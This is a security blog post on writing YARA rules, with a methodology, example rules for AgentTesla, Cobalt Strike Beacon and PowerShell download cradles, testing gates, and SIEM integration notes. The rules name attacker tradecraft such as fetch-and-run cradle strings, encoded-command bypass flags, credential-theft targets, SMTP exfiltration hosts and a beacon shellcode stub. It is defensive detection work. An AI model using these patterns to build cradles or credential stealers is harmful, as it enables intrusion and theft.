Featured image of post YARA Rules for Malware Detection

YARA Rules for Malware Detection

Custom YARA rules for detecting malware families and attacker tooling observed in regional threat campaigns, with authoring methodology, testing procedures, and SIEM integration.

Overview

YARA is the de facto standard for malware classification and detection. A well-written YARA rule can identify a malware family across samples even when hashes change — by targeting the underlying code patterns, strings, and structural features that threat actors reuse.

This project covers:

  • The methodology for authoring effective YARA rules
  • Rules developed for malware families and tools observed in regional campaigns
  • Testing and validation procedures before deployment
  • Integration with SIEM, EDR, and sandbox platforms

YARA Rule Authoring Methodology

Writing a rule that fires on real malware without generating false positives requires a structured approach.

Step 1 — Collect samples

Start with at least 3–5 samples from the same family. Sources:

  • MalwareBazaar (abuse.ch) — free, tagged by family
  • VirusTotal — search by behaviour or YARA match
  • Any.run — pull samples from public sandbox sessions
  • Internal SIEM/EDR — malware that actually hit your environment

Step 2 — Static analysis — find unique strings

1
2
3
4
5
6
# Extract printable strings from a sample
strings -n 8 sample.exe | sort | uniq > strings_sample1.txt
strings -n 8 sample2.exe | sort | uniq > strings_sample2.txt

# Find strings common to all samples but not in clean binaries
comm -12 strings_sample1.txt strings_sample2.txt > common_strings.txt

Strings worth targeting:

  • Mutex names (malware often uses a unique mutex to prevent double-execution)
  • Registry keys used for persistence
  • C2 URL patterns (even partial paths like /gate.php)
  • Custom user-agent strings
  • Hardcoded error messages or debug strings

Step 3 — Binary pattern analysis

1
2
3
4
5
6
7
# Use radare2 to find unique byte sequences
r2 sample.exe
[0x00401000]> /x 4d5a  # Find MZ header
[0x00401000]> pd 20    # Disassemble 20 instructions

# Or use FLOSS for obfuscated string extraction
floss sample.exe > floss_output.txt

Step 4 — Write the rule

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
rule Malware_Family_Name {
    meta:
        description = "Detects [Family] based on mutex, PDB path, and C2 pattern"
        author      = "Mohammad Al Sayegh"
        date        = "2026-03-01"
        hash1       = "e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855"
        tlp         = "WHITE"
        mitre_att_ck = "T1059.003, T1547.001"

    strings:
        $mutex       = "Global\\MutexName_12AB" ascii wide
        $pdb_path    = "C:\\Users\\dev\\malware\\Release\\payload.pdb" ascii
        $c2_pattern  = "/api/v2/gate?uid=" ascii
        $reg_key     = "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\\Updater" ascii wide
        $packed_stub = { 55 8B EC 83 EC ?? 53 56 57 E8 ?? ?? ?? ?? }

    condition:
        uint16(0) == 0x5A4D  // MZ header — must be a PE file
        and filesize < 5MB
        and (
            $mutex or $pdb_path or $c2_pattern
            or ($reg_key and $packed_stub)
        )
}

Step 5 — Test before deployment

1
2
3
4
5
6
7
8
9
# Test against known-bad samples (should ALL match)
yara -r rule.yar /path/to/malware_samples/

# Test against clean binaries (should produce ZERO matches)
yara -r rule.yar /path/to/clean_windows_binaries/
yara -r rule.yar C:\Windows\System32\

# Test performance (rules with complex regex can be slow)
time yara -r rule.yar /large/file/corpus/

Example Rules

Rule 1 — AgentTesla Keylogger

AgentTesla is a widely-used commodity keylogger sold on underground forums. It is frequently weaponised in phishing campaigns targeting the Middle East.

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
rule AgentTesla_Keylogger {
    meta:
        description  = "Detects AgentTesla keylogger based on SMTP exfil strings and mutex"
        author       = "Mohammad Al Sayegh"
        date         = "2026-01-10"
        mitre_att_ck = "T1056.001, T1071.003"
        reference    = "https://malpedia.caad.fkie.fraunhofer.de/details/win.agent_tesla"

    strings:
        // SMTP exfiltration strings — hardcoded in many variants
        $smtp1 = "smtp.gmail.com" ascii nocase
        $smtp2 = "mail.yahoo.com" ascii nocase
        $smtp3 = "smtp.mail.ru"   ascii nocase

        // Keylogger capability strings
        $kl1 = "GetAsyncKeyState" ascii
        $kl2 = "[Shift]"          ascii
        $kl3 = "[Caps Lock]"      ascii
        $kl4 = "[Backspace]"      ascii

        // .NET artifact — common namespace
        $ns1 = "AgentTesla"      ascii wide
        $ns2 = "Tesla.Keylogger" ascii wide

        // Credential theft targets
        $cred1 = "filezilla"   ascii nocase
        $cred2 = "chrome"      ascii nocase
        $cred3 = "outlook"     ascii nocase

    condition:
        uint16(0) == 0x5A4D
        and filesize < 3MB
        and (
            ($ns1 or $ns2)
            or (2 of ($smtp*) and 2 of ($kl*))
            or (2 of ($cred*) and 1 of ($kl*))
        )
}

Rule 2 — Cobalt Strike Beacon (Default Config)

Cobalt Strike is a legitimate penetration testing tool that has been heavily adopted by threat actors. Default configurations leave identifiable artifacts.

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
rule CobaltStrike_Beacon_Default {
    meta:
        description  = "Detects Cobalt Strike Beacon with default or near-default configuration"
        author       = "Mohammad Al Sayegh"
        date         = "2026-01-22"
        mitre_att_ck = "T1071.001, T1573.002"
        reference    = "https://www.cobaltstrike.com"

    strings:
        // Default sleep/jitter strings in beacon config
        $sleep     = "%d (seconds)" ascii
        $jitter    = "Set %s.Metadata" ascii

        // Common default C2 URIs in many leaked/cracked versions
        $uri1 = "/updates.rss"   ascii
        $uri2 = "/dpixel"        ascii
        $uri3 = "/______util.js" ascii
        $uri4 = "/jquery-3.3.1.slim.min.js" ascii

        // Beacon shellcode staging pattern
        $shellcode = { FC E8 8? 00 00 00 60 89 E5 31 D2 64 8B 52 30 }

        // Named pipe for SMB beacon
        $pipe = "\\\\.\\pipe\\msagent_" ascii wide

    condition:
        (uint16(0) == 0x5A4D and filesize < 10MB
         and (2 of ($uri*) or ($shellcode and 1 of ($uri*))))
        or ($pipe and $shellcode)
}

Rule 3 — PowerShell Download Cradle (Generic)

Download cradles are used across many campaigns to pull second-stage payloads. This rule targets common obfuscation patterns.

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
rule PowerShell_Download_Cradle {
    meta:
        description  = "Detects common PowerShell download cradle patterns used in phishing and initial access"
        author       = "Mohammad Al Sayegh"
        date         = "2026-02-05"
        mitre_att_ck = "T1059.001, T1105"

    strings:
        // Invoke-Expression variants (obfuscated)
        $iex1 = "IEX"                       ascii nocase
        $iex2 = "Invoke-Expression"          ascii nocase
        $iex3 = "&([scriptblock]::Create("   ascii nocase

        // Download methods
        $dl1 = "DownloadString"   ascii nocase
        $dl2 = "DownloadFile"     ascii nocase
        $dl3 = "WebClient"        ascii nocase
        $dl4 = "Net.WebClient"    ascii nocase
        $dl5 = "Invoke-WebRequest" ascii nocase

        // Bypass techniques
        $bp1 = "bypass"            ascii nocase
        $bp2 = "-EncodedCommand"   ascii nocase
        $bp3 = "Set-ExecutionPolicy" ascii nocase

        // Base64 encoded PS is always suspicious
        $b64 = /[A-Za-z0-9+\/]{100,}={0,2}/ ascii

    condition:
        filesize < 500KB
        and (
            (1 of ($iex*) and 1 of ($dl*))
            or (1 of ($iex*) and $b64 and 1 of ($bp*))
            or (2 of ($dl*) and 1 of ($bp*))
        )
}

Testing Framework

Before a rule is deployed to production scanners, it must pass three gates:

1
2
3
4
5
6
7
8
9
# Gate 1: True Positive Rate — must match ≥ 95% of known samples
yara rule.yar /samples/family_name/ | wc -l  # Should equal sample count

# Gate 2: False Positive Rate — must produce 0 matches on clean corpus
yara rule.yar /corpus/windows_clean/ | wc -l   # Must be 0
yara rule.yar /corpus/office_suite/  | wc -l   # Must be 0

# Gate 3: Performance — must complete within 500ms per 100MB
time yara rule.yar /test/100mb_file.bin

Integrating YARA with Your Stack

CrowdStrike Custom IOA

Upload the YARA rule as a Custom IOC → File Hash (not directly supported) or use the Intel API to correlate hashes matched by your rule against CrowdStrike’s telemetry.

Splunk + YARA via TA

The Splunk YARA TA allows scanning file paths or stream data against YARA rules and generating alerts when a match fires.

Any.run / Cuckoo Sandbox

Both platforms accept YARA rules for automated classification. Add your rules to the Cuckoo signatures/ folder or upload to Any.run’s YARA manager.

MISP

MISP has native YARA rule support. Store rules as yara typed attributes on threat actor or malware family events, and share with your ISAC or trusted partners under appropriate TLP.


All rules are provided for defensive, detection, and research purposes. Contact me at contact@malsayegh.ae to collaborate on detection development.

comments powered by Disqus
All rights Reserved for malsayegh.ae
Built with Hugo
Theme Stack designed by Jimmy